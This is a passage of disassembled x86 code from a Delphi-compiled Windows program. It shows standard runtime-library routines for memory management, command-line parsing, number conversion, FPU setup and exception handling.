mov eax, [esp+18h+var_18]
sub [esp+18h+var_14], eax
jmp short loc_402358
; ---------------------------------------------------------------------------
loc_40232C: ; CODE XREF: sub_4021CC+150�j
call sub_401950
mov eax, [esp+18h+var_14]
sub [esp+18h+var_18], eax
cmp [esp+18h+var_18], 0Ch
jl short loc_40234C
mov eax, ebp
add eax, esi
mov edx, [esp+18h+var_18]
call sub_401BB8
jmp short loc_402386
; ---------------------------------------------------------------------------
loc_40234C: ; CODE XREF: sub_4021CC+170�j
add esi, [esp+18h+var_18]
mov ebx, ebp
add ebx, esi
and dword ptr [ebx], 0FFFFFFFEh
jmp short loc_402386
; ---------------------------------------------------------------------------
loc_402358: ; CODE XREF: sub_4021CC+13D�j
; sub_4021CC+15E�j
mov eax, [ebx]
test eax, 80000000h
jz short loc_402382
and eax, 7FFFFFFCh
add eax, ebx
mov ebx, eax
mov edx, [esp+18h+var_14]
mov eax, ebx
call sub_401D44
test al, al
jz short loc_402382
mov ebx, ebp
add ebx, edi
jmp loc_40228F
; ---------------------------------------------------------------------------
loc_402382: ; CODE XREF: sub_4021CC+193�j
; sub_4021CC+1AB�j
xor eax, eax
jmp short loc_40239F
; ---------------------------------------------------------------------------
loc_402386: ; CODE XREF: sub_4021CC+68�j
; sub_4021CC+82�j ...
mov eax, esi
sub eax, edi
add ds:dword_4075A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
loc_40239F: ; CODE XREF: sub_4021CC+33�j
; sub_4021CC+12C�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4021CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023A8 proc near ; CODE XREF: sub_4024AC+D�p
; DATA XREF: DATA:off_406034�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_4023CF
call sub_4017AC
test al, al
jnz short loc_4023CF
xor eax, eax
mov [ebp+var_4], eax
jmp loc_402460
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_4023A8+12�j
; sub_4023A8+1B�j
xor edx, edx
push ebp
push offset loc_402459
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_4023F0
push offset dword_4075B4
call sub_401108 ; RtlEnterCriticalSection
loc_4023F0: ; CODE XREF: sub_4023A8+3C�j
mov edx, esi
mov eax, ebx
call sub_4021CC
test al, al
jz short loc_402402
mov [ebp+var_4], ebx
jmp short loc_402438
; ---------------------------------------------------------------------------
loc_402402: ; CODE XREF: sub_4023A8+53�j
mov eax, esi
call sub_401E98
mov edi, eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_402420
mov eax, esi
loc_402420: ; CODE XREF: sub_4023A8+74�j
test edi, edi
jz short loc_402435
mov edx, edi
mov ecx, ebx
xchg eax, ecx
call sub_402570
mov eax, ebx
call sub_402028
loc_402435: ; CODE XREF: sub_4023A8+7A�j
mov [ebp+var_4], edi
loc_402438: ; CODE XREF: sub_4023A8+58�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402460
loc_402445: ; CODE XREF: sub_4023A8+B6�j
cmp ds:byte_407035, 0
jz short locret_402458
push offset dword_4075B4
call sub_401110 ; RtlLeaveCriticalSection
locret_402458: ; CODE XREF: sub_4023A8+A4�j
retn
; ---------------------------------------------------------------------------
loc_402459: ; DATA XREF: sub_4023A8+2A�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_402445
; ---------------------------------------------------------------------------
loc_402460: ; CODE XREF: sub_4023A8+22�j
; DATA XREF: sub_4023A8+98�o
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4023A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40246C proc near ; CODE XREF: sub_4031DC+C�p
; sub_4037A4+CA�p ...
push ebx
test eax, eax
jle short loc_402486
call ds:off_40602C
mov ebx, eax
test ebx, ebx
jnz short loc_402488
mov al, 1
call sub_402554
; ---------------------------------------------------------------------------
jmp short loc_402488
; ---------------------------------------------------------------------------
loc_402486: ; CODE XREF: sub_40246C+3�j
xor ebx, ebx
loc_402488: ; CODE XREF: sub_40246C+F�j
; sub_40246C+18�j
mov eax, ebx
pop ebx
retn
sub_40246C endp
; =============== S U B R O U T I N E =======================================
sub_40248C proc near ; CODE XREF: sub_403118+1C�p
; sub_40313C+21�p ...
push ebx
test eax, eax
jz short loc_4024A6
call ds:off_406030
mov ebx, eax
test ebx, ebx
jz short loc_4024A8
mov al, 2
call sub_402554
; ---------------------------------------------------------------------------
jmp short loc_4024A8
; ---------------------------------------------------------------------------
loc_4024A6: ; CODE XREF: sub_40248C+3�j
xor ebx, ebx
loc_4024A8: ; CODE XREF: sub_40248C+F�j
; sub_40248C+18�j
mov eax, ebx
pop ebx
retn
sub_40248C endp
; =============== S U B R O U T I N E =======================================
sub_4024AC proc near ; CODE XREF: sub_403350+22�p
; sub_4037A4+BB�p
mov ecx, [eax]
test ecx, ecx
jz short loc_4024E4
test edx, edx
jz short loc_4024CE
push eax
mov eax, ecx
call ds:off_406034
pop ecx
or eax, eax
jz short loc_4024DD
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_4024C7: ; CODE XREF: sub_4024AC+2E�j
mov al, 2
jmp sub_402554
; ---------------------------------------------------------------------------
loc_4024CE: ; CODE XREF: sub_4024AC+8�j
mov [eax], edx
mov eax, ecx
call ds:off_406030
or eax, eax
jnz short loc_4024C7
retn
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_4024AC+16�j
; sub_4024AC+48�j
mov al, 1
jmp sub_402554
; ---------------------------------------------------------------------------
loc_4024E4: ; CODE XREF: sub_4024AC+4�j
test edx, edx
jz short locret_4024F8
push eax
mov eax, edx
call ds:off_40602C
pop ecx
or eax, eax
jz short loc_4024DD
mov [ecx], eax
locret_4024F8: ; CODE XREF: sub_4024AC+3A�j
retn
sub_4024AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4024FC proc near ; CODE XREF: sub_402508+42�p
; CODE:00402D1F�p
mov ds:dword_406004, edx
call sub_403100
sub_4024FC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402508 proc near ; CODE XREF: sub_402554+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_407008, 0
jz short loc_402524
mov edx, esi
mov eax, ebx
call ds:dword_407008
loc_402524: ; CODE XREF: sub_402508+10�j
test bl, bl
jnz short loc_402535
call sub_403CD4
mov ebx, [eax+4]
jmp short loc_402544
; ---------------------------------------------------------------------------
loc_402535: ; CODE XREF: sub_402508+1E�j
cmp bl, 18h
ja short loc_402544
xor eax, eax
mov al, bl
mov bl, ds:byte_406038[eax]
loc_402544: ; CODE XREF: sub_402508+2B�j
; sub_402508+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_4024FC
sub_402508 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402554 proc near ; CODE XREF: sub_40246C+13�p
; sub_40248C+13�p ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_402508
sub_402554 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402560 proc near ; CODE XREF: sub_4026FC+38�p
; sub_4026FC+4C�p
push ebx
mov ebx, eax
call sub_403CD4
mov [eax+4], ebx
pop ebx
retn
sub_402560 endp
; =============== S U B R O U T I N E =======================================
sub_402570 proc near ; CODE XREF: sub_4023A8+81�p
; sub_402784+6�p ...
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_40258F
jz short loc_4025AD
sar ecx, 2
js short loc_4025AD
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40258F: ; CODE XREF: sub_402570+A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
sar ecx, 2
js short loc_4025AD
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_4025AD: ; CODE XREF: sub_402570+C�j
; sub_402570+11�j ...
pop edi
pop esi
retn
sub_402570 endp
; =============== S U B R O U T I N E =======================================
sub_4025B0 proc near ; CODE XREF: sub_40269C+41�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_4025C2
; ---------------------------------------------------------------------------
loc_4025BA: ; CODE XREF: sub_4025B0+1A�j
push ebx
call sub_40103C ; CharNextA
mov ebx, eax
loc_4025C2: ; CODE XREF: sub_4025B0+8�j
; sub_4025B0+2A�j
mov al, [ebx]
test al, al
jz short loc_4025CC
cmp al, 20h
jbe short loc_4025BA
loc_4025CC: ; CODE XREF: sub_4025B0+16�j
cmp byte ptr [ebx], 22h
jnz short loc_4025DC
cmp byte ptr [ebx+1], 22h
jnz short loc_4025DC
add ebx, 2
jmp short loc_4025C2
; ---------------------------------------------------------------------------
loc_4025DC: ; CODE XREF: sub_4025B0+1F�j
; sub_4025B0+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_402625
; ---------------------------------------------------------------------------
loc_4025E2: ; CODE XREF: sub_4025B0+79�j
cmp al, 22h
jnz short loc_402617
push ebx
call sub_40103C ; CharNextA
mov ebx, eax
jmp short loc_4025FE
; ---------------------------------------------------------------------------
loc_4025F0: ; CODE XREF: sub_4025B0+56�j
push ebx
call sub_40103C ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_4025FE: ; CODE XREF: sub_4025B0+3E�j
mov al, [ebx]
test al, al
jz short loc_402608
cmp al, 22h
jnz short loc_4025F0
loc_402608: ; CODE XREF: sub_4025B0+52�j
cmp byte ptr [ebx], 0
jz short loc_402625
push ebx
call sub_40103C ; CharNextA
mov ebx, eax
jmp short loc_402625
; ---------------------------------------------------------------------------
loc_402617: ; CODE XREF: sub_4025B0+34�j
push ebx
call sub_40103C ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_402625: ; CODE XREF: sub_4025B0+30�j
; sub_4025B0+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_4025E2
mov eax, esi
mov edx, ebp
call sub_403350
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_40268D
; ---------------------------------------------------------------------------
loc_40263C: ; CODE XREF: sub_4025B0+E1�j
cmp al, 22h
jnz short loc_402678
push ebx
call sub_40103C ; CharNextA
mov ebx, eax
jmp short loc_40265F
; ---------------------------------------------------------------------------
loc_40264A: ; CODE XREF: sub_4025B0+B7�j
push ebx
call sub_40103C ; CharNextA
cmp eax, ebx
jbe short loc_40265F
loc_402654: ; CODE XREF: sub_4025B0+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_402654
loc_40265F: ; CODE XREF: sub_4025B0+98�j
; sub_4025B0+A2�j
mov al, [ebx]
test al, al
jz short loc_402669
cmp al, 22h
jnz short loc_40264A
loc_402669: ; CODE XREF: sub_4025B0+B3�j
cmp byte ptr [ebx], 0
jz short loc_40268D
push ebx
call sub_40103C ; CharNextA
mov ebx, eax
jmp short loc_40268D
; ---------------------------------------------------------------------------
loc_402678: ; CODE XREF: sub_4025B0+8E�j
push ebx
call sub_40103C ; CharNextA
cmp eax, ebx
jbe short loc_40268D
loc_402682: ; CODE XREF: sub_4025B0+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_402682
loc_40268D: ; CODE XREF: sub_4025B0+8A�j
; sub_4025B0+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_40263C
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4025B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40269C proc near ; CODE XREF: CODE:00405AF8�p
var_114 = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_403118
test esi, esi
jnz short loc_4026D2
push 105h
lea eax, [esp+118h+var_114]
push eax
push 0
call sub_40106C ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_403208
jmp short loc_4026F0
; ---------------------------------------------------------------------------
loc_4026D2: ; CODE XREF: sub_40269C+16�j
call sub_40105C ; GetCommandLineA
mov edi, eax
loc_4026D9: ; CODE XREF: sub_40269C+52�j
mov edx, ebx
mov eax, edi
call sub_4025B0
mov edi, eax
test esi, esi
jz short loc_4026F0
cmp dword ptr [ebx], 0
jz short loc_4026F0
dec esi
jmp short loc_4026D9
; ---------------------------------------------------------------------------
loc_4026F0: ; CODE XREF: sub_40269C+34�j
; sub_40269C+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_40269C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4026FC proc near ; CODE XREF: sub_403B34+1E�p
; sub_403B34+28�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_40273B
cmp ax, 0D7B3h
ja short loc_40273B
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_402723
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_402723: ; CODE XREF: sub_4026FC+1E�j
test esi, esi
jnz short loc_40272E
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_40272E: ; CODE XREF: sub_4026FC+29�j
test esi, esi
jz short loc_40274D
mov eax, esi
call sub_402560
jmp short loc_40274D
; ---------------------------------------------------------------------------
loc_40273B: ; CODE XREF: sub_4026FC+E�j
; sub_4026FC+14�j
cmp ebx, offset dword_407038
jz short loc_40274D
mov eax, 67h
call sub_402560
loc_40274D: ; CODE XREF: sub_4026FC+34�j
; sub_4026FC+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_4026FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402754 proc near ; CODE XREF: sub_404254+41�p
; sub_404254+71�p ...
push esi
push edi
mov edi, eax
xor eax, eax
mov al, [edi]
mov esi, edx
xor edx, edx
mov dl, [esi]
inc esi
add al, dl
jb short loc_402779
cmp al, cl
ja short loc_402779
loc_40276B: ; CODE XREF: sub_402754+2D�j
mov ecx, edx
mov dl, [edi]
mov [edi], al
inc edi
add edi, edx
rep movsb
loc_402776: ; CODE XREF: sub_402754+29�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402779: ; CODE XREF: sub_402754+11�j
; sub_402754+15�j
mov al, cl
sub cl, [edi]
jbe short loc_402776
mov dl, cl
jmp short loc_40276B
sub_402754 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402784 proc near ; CODE XREF: sub_404254+1E�p
; sub_404254+4E�p ...
xor ecx, ecx
mov cl, [edx]
inc ecx
xchg eax, edx
call sub_402570
retn
sub_402784 endp
; =============== S U B R O U T I N E =======================================
sub_402790 proc near ; CODE XREF: sub_4037A4+F1�p
; sub_4037A4+145�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_4027AD
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_4027AD: ; CODE XREF: sub_402790+12�j
pop edi
retn
sub_402790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_403AC0+41�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_402826
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_4027C3: ; CODE XREF: sub_4027B0+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_4027C3
mov ch, 0
cmp bl, 2Dh
jz short loc_402834
cmp bl, 2Bh
jz short loc_402836
loc_4027D7: ; CODE XREF: sub_4027B0+89�j
cmp bl, 24h
jz short loc_40283B
cmp bl, 78h
jz short loc_40283B
cmp bl, 58h
jz short loc_40283B
cmp bl, 30h
jnz short loc_4027FE
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_40283B
cmp bl, 58h
jz short loc_40283B
test bl, bl
jz short loc_40281C
jmp short loc_402802
; ---------------------------------------------------------------------------
loc_4027FE: ; CODE XREF: sub_4027B0+39�j
test bl, bl
jz short loc_40282F
loc_402802: ; CODE XREF: sub_4027B0+4C�j
; sub_4027B0+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_40282F
cmp eax, edi
ja short loc_40282F
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402802
loc_40281C: ; CODE XREF: sub_4027B0+4A�j
dec ch
jz short loc_402829
test eax, eax
jge short loc_402878
jmp short loc_40282F
; ---------------------------------------------------------------------------
loc_402826: ; CODE XREF: sub_4027B0+8�j
; sub_4027B0+95�j
inc esi
jmp short loc_40282F
; ---------------------------------------------------------------------------
loc_402829: ; CODE XREF: sub_4027B0+6E�j
neg eax
jle short loc_402878
js short loc_402878
loc_40282F: ; CODE XREF: sub_4027B0+50�j
; sub_4027B0+58�j ...
pop ebx
sub esi, ebx
jmp short loc_40287B
; ---------------------------------------------------------------------------
loc_402834: ; CODE XREF: sub_4027B0+20�j
inc ch
loc_402836: ; CODE XREF: sub_4027B0+25�j
mov bl, [esi]
inc esi
jmp short loc_4027D7
; ---------------------------------------------------------------------------
loc_40283B: ; CODE XREF: sub_4027B0+2A�j
; sub_4027B0+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_402826
loc_402847: ; CODE XREF: sub_4027B0+C0�j
cmp bl, 61h
jb short loc_40284F
sub bl, 20h
loc_40284F: ; CODE XREF: sub_4027B0+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_402862
sub bl, 11h
cmp bl, 5
ja short loc_40282F
add bl, 0Ah
loc_402862: ; CODE XREF: sub_4027B0+A5�j
cmp eax, edi
ja short loc_40282F
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402847
dec ch
jnz short loc_402878
neg eax
loc_402878: ; CODE XREF: sub_4027B0+72�j
; sub_4027B0+7B�j ...
pop ecx
xor esi, esi
loc_40287B: ; CODE XREF: sub_4027B0+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_4027B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402884 proc near ; CODE XREF: sub_40288C+5�p
; sub_40288C+11�p
jmp ds:dword_408110
sub_402884 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40288C proc near ; CODE XREF: sub_403B88+39�p
push ebx
xor ebx, ebx
push 0
call sub_402884 ; GetKeyboardType
cmp eax, 7
jnz short loc_4028B7
push 1
call sub_402884 ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_4028B5
cmp eax, 400h
jnz short loc_4028B7
loc_4028B5: ; CODE XREF: sub_40288C+20�j
mov bl, 1
loc_4028B7: ; CODE XREF: sub_40288C+D�j
; sub_40288C+27�j
mov eax, ebx
pop ebx
retn
sub_40288C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028BC proc near ; CODE XREF: sub_403B88+42�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, ds:word_406014
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_40108C ; RegOpenKeyExA
test eax, eax
jnz short loc_402934
xor eax, eax
push ebp
push offset loc_40292D
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_401094 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402934
loc_402923: ; CODE XREF: sub_4028BC+76�j
mov eax, [ebp+var_4]
push eax
call sub_401084 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_40292D: ; DATA XREF: sub_4028BC+2E�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_402923
; ---------------------------------------------------------------------------
loc_402934: ; CODE XREF: sub_4028BC+29�j
; DATA XREF: sub_4028BC+62�o
mov ax, ds:word_406014
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov ds:word_406014, ax
mov esp, ebp
pop ebp
retn
sub_4028BC endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_4028BC+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_4028BC+4C�o
align 10h
; =============== S U B R O U T I N E =======================================
sub_402980 proc near ; CODE XREF: sub_402E10-368�p
; CODE:00402D56�p ...
fninit
wait
fldcw ds:word_406014
retn
sub_402980 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40298C proc near ; CODE XREF: CODE:00402BA7�j
; sub_402BEC+30�p ...
test eax, eax
jz short locret_402997
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_402997: ; CODE XREF: sub_40298C+2�j
retn
sub_40298C endp
; =============== S U B R O U T I N E =======================================
sub_402998 proc near ; CODE XREF: sub_402BEC+35�p
cmp ds:byte_406018, 1
jbe short locret_4029B2
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_407010
locret_4029B2: ; CODE XREF: sub_402998+7�j
retn
sub_402998 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4029B4 proc near ; CODE XREF: sub_402E10-33B�p
cmp ds:byte_406018, 0
jz short locret_4029D4
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_407010
add esp, 8
pop eax
locret_4029D4: ; CODE XREF: sub_4029B4+7�j
retn
sub_4029B4 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4029F0
loc_4029D8: ; CODE XREF: sub_4029F0+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_407010
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_4029F0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4029F0 proc near ; CODE XREF: sub_402E10-28B�p
; FUNCTION CHUNK AT 004029D8 SIZE 00000015 BYTES
cmp ds:byte_406018, 1
jbe short locret_402A00
push eax
push ebx
jmp loc_4029D8
; ---------------------------------------------------------------------------
locret_402A00: ; CODE XREF: sub_4029F0+7�j
retn
sub_4029F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A04 proc near ; CODE XREF: sub_402A24+C�p
test ecx, ecx
jz short locret_402A21
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_402A1C
cmp byte ptr [ecx], 0EBh
jnz short locret_402A21
movsx eax, al
inc ecx
inc ecx
jmp short loc_402A1F
; ---------------------------------------------------------------------------
loc_402A1C: ; CODE XREF: sub_402A04+A�j
add ecx, 5
loc_402A1F: ; CODE XREF: sub_402A04+16�j
add ecx, eax
locret_402A21: ; CODE XREF: sub_402A04+2�j
; sub_402A04+F�j
retn
sub_402A04 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A24 proc near ; CODE XREF: sub_4017AC+142D�p
cmp ds:byte_406018, 1
jbe short locret_402A4A
push eax
push edx
push ecx
call sub_402A04
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_407010
pop ecx
pop ecx
pop edx
pop eax
locret_402A4A: ; CODE XREF: sub_402A24+7�j
retn
sub_402A24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A4C proc near ; CODE XREF: sub_402C40+28�p
cmp ds:byte_406018, 1
jbe short locret_402A67
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_407010
pop edx
locret_402A67: ; CODE XREF: sub_402A4C+7�j
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402A68 proc near ; CODE XREF: CODE:loc_402D9D�p
push eax
push edx
cmp ds:byte_406018, 1
jbe short loc_402A83
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_407010
loc_402A83: ; CODE XREF: sub_402A68+9�j
pop edx
pop eax
retn
sub_402A68 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402E10
loc_402A88: ; CODE XREF: sub_402E10:loc_402E56�j
; sub_402E70:loc_402EB6�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jnz loc_402BAC
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_402B15
cld
call sub_402980
mov edx, ds:dword_40700C
test edx, edx
jz loc_402BAC
call edx ; dword_40700C
test eax, eax
jz loc_402BAC
mov edx, [esp-4+arg_8]
mov ecx, [esp-4+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_402B0C
call sub_4029B4
cmp ds:byte_40601C, 0
jbe short loc_402B0C
cmp ds:byte_406018, 0
ja short loc_402B0C
lea ecx, [esp-4+arg_0]
push eax
push ecx
call sub_40102C ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_402BAC
mov edx, eax
mov eax, [esp+4]
mov ecx, [eax+0Ch]
jmp short loc_402B3C
; ---------------------------------------------------------------------------
loc_402B0C: ; CODE XREF: sub_402E10-33D�j
; sub_402E10-32F�j ...
mov edx, eax
mov eax, [esp-4+arg_0]
mov ecx, [eax+0Ch]
loc_402B15: ; CODE XREF: sub_402E10-36B�j
cmp ds:byte_40601C, 1
jbe short loc_402B3C
cmp ds:byte_406018, 0
ja short loc_402B3C
push eax
lea eax, [esp+arg_0]
push edx
push ecx
push eax
call sub_40102C ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_402BAC
loc_402B3C: ; CODE XREF: sub_402E10-306�j
; sub_402E10-2F4�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_0]
push 0
push eax
push offset loc_402B60
push edx
call ds:off_407014
loc_402B60: ; DATA XREF: sub_402E10-2BC�o
mov edi, [esp+30h+var_8]
call sub_403CD4
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset sub_402B8C
add ebx, 5
call sub_4029F0
jmp ebx
; END OF FUNCTION CHUNK FOR sub_402E10
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B8C proc near ; DATA XREF: sub_402E10-295�o
jmp loc_402BB4
sub_402B8C endp
; ---------------------------------------------------------------------------
call sub_403CD4
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_40298C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402E10
loc_402BAC: ; CODE XREF: sub_402E10-37D�j
; sub_402E10-35B�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_402E10
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4017AC
loc_402BB4: ; CODE XREF: sub_4017AC:loc_401862�j
; sub_401870:loc_401946�j ...
mov eax, [esp+4]
mov edx, [esp+arg_0]
test dword ptr [eax+4], 6
jz short loc_402BE4
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_402BE4
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_402A24
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_402BE4: ; CODE XREF: sub_4017AC+1417�j
; DATA XREF: sub_4017AC+141C�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_4017AC
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402BEC proc near ; CODE XREF: sub_402E10+50�p
; sub_402E70+50�p
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_402C37
call sub_403CD4
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_402C26
mov eax, [edx+8]
call sub_40298C
call sub_402998
loc_402C26: ; CODE XREF: sub_402BEC+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_402C37: ; DATA XREF: sub_402BEC+4�o
